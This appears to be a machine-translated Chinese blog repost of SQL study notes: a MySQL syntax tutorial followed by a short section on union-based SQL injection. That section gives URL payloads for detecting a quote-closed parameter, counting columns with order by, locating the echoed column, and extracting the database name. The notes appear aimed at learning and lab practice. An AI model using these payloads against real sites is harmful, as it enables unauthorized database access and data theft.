当前位置:网站首页>SQL injection -day16

SQL injection -day16

2022-07-03 18:04:00 kanna_ bush_ t

3、 ... and 、Mysql Inject

3.2 sentence

insert:
insert into Table name ( Field name 1, Field name 2, Field name 3......) values( value 1, value 2, value 3......);
delete:
delete from Table name where Conditions ;// Roll back
For large table :
truncate table Table name ;// Cannot roll back , Will be lost forever
update:
update Table name set Field name 1= value 1, Field name 2= value 2,......where Conditions ;
select:
select Field 1, Field 2,...... from + Table name where + Conditions ;
between and:
select * from users where id between 2 and 8;
select * from users where id >=2 and id <=8;
in not in:
select password from users where id not in(5,8);
Finger check to find out id It's not equal to 5 and id It's not equal to 8 The password of the user ( notes : No 5~8,in Then it's not an interval )
like:(% Represents any number of characters    _ Represents any character )
select username from users where username like '%b%';
// Point to find the letters in the user name b Username
select username from users where username like '_a%';
// Point out that the second letter in the user name is a Username
select username from users where username like '%b';
// Point to find out that the last letter in the user name is b Username
select username from users where username like '%\_%';
// Point to find the underlined user name _ Username
( notes : Special characters need to be escaped )
order by:
select username from users order by Field name ;
( notes : The default is ascending )
Specify ascending order :asc
select username from users order by Field name asc;
Specify descending order :desc
select username from users order by Field name desc;
Dual demand :
select username from users order by Field name 1 desc, Field name 2 asc;
Group function :
  • select sum(grade) from users;
  • select avg(grade) from users;
  • select max(grade) from users;
  • select min(grade) from users;
Empty processing function :
select sum(ifnull(salary,0)*12), from crew;
Ask for the sum of one year's salary , When the salary is NULL when , Be used as a 0 To deal with it
count(*) And count:
count(*) : Count the total number of records , Instead of counting the data in a field , Field independent
count( A specific field ): The specific statistical field is not NULL Total of
  • String data sum,avg by 0,max,min Take by letter size
  • The grouping function will automatically ignore NULL
  • Mathematical operations If any NULL Participate in , The result is NULL
  • Grouping functions cannot appear directly in where Back , as a result of group by Is in where Executed after statement execution
  • Grouping functions can be combined
group by And having:
group by: Group by a field or fields
having: Filter the data after grouping again , namely having Must be with the group by Use... In the back
select max(grade) from students group by classes;
// First group according to the class , Then find out the grades of the students with the highest grades in each class
Grouping functions are generally similar to group by A combination of , And any grouping function (count,sum,avg,max,min) all
When one sql The statement did not group by when , The whole table will form a group
When sql Use in statement group by when ,select After that, you can only follow the fields or grouping functions that participate in grouping
( notes : In fact, mysql in , You can use and execute , But it doesn't make sense ; And because the Oracle Than Mysql Be more strict )
distinct duplicate removal :
distinct keyword Remove duplicate records
select distinct job from company;
// Query the positions in the company
Statement execution order :
  • select 5 Number : Pick out the data that meets the conditions
  • from 1 Number : Set the table
  • where 2 Number : Filter raw data
  • group by 3 Number : Grouping
  • having 4 Number : Filter the data again
  • order by 6 Number : Sort
inner join:
select a.ename,b.dname from emp a join dept b on a.deptno=b.deptno;
left/right join:
select dname,ename from dept a left join emp b on a.deptno=b.deptno;
or sentence : Execute when the previous statement does not conform to the situation or there is an error or Later

 

  Four 、union Joint injection ( The single quotation mark closed character type is taken as an example )

4.1 Injection judgment 

?id=1'
?id=1'

4.2 order by Inquire about 

?id=1' order by x--+
?id=1' order by x#-> Commonly used %23 Instead of 
// among x Which column does the input number represent , Use dichotomy to narrow the scope ,x Then there are two minus signs and plus signs , For comments

4.3 Determine the echo position , Take three columns as an example 

?id=-1' union select 1,2,3--+
?id=0' union select 1,2,3--+
?id=1' and 1=2 union select 1,2,3--+
// The front is to deny  id=1  Echo of , Prevent others  sql  Statement only  limit 0,1
// In this way, we can't view the information we want

4.4 Echo position injection sql sentence 

?id=-1' union select 1,(select database()),3--+  

原网站

版权声明
本文为[kanna_ bush_ t]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/02/202202150304578990.html

边栏推荐

猜你喜欢

随机推荐